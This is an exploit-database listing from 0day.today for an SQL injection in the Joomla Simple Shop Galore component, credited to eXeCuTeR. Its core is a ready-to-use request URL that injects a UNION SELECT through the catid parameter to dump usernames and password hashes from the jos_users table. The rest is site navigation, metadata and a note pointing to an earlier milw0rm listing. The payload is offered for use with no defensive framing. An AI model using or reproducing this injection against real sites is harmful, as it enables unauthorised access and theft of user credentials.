[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Simple Shop Galore Component 3.x (catid) SQL Injection

Author
eXeCuTeR
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3197
Category
web applications
Date add
15-06-2008
Platform
unsorted
=============================================================
Joomla Simple Shop Galore Component 3.x (catid) SQL Injection
=============================================================


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
@ Joomla ~ option: com_simpleshop ~ SQL Injection

------------------------------------------------------

@ DORK: :\

------------------------------------------------------

@ Vuln:
index.php?option=com_simpleshop&task=browse&Itemid=eXeCuTeR&catid=null%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8%20from%20jos_users--
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
					~EOF~

side note:

same vulnerability listed here: http://milw0rm.com/exploits/5743
but this was sent in back in 02/2008, must of missed it.  Original author: eXeCuTeR.



#  0day.today [2024-11-15]  #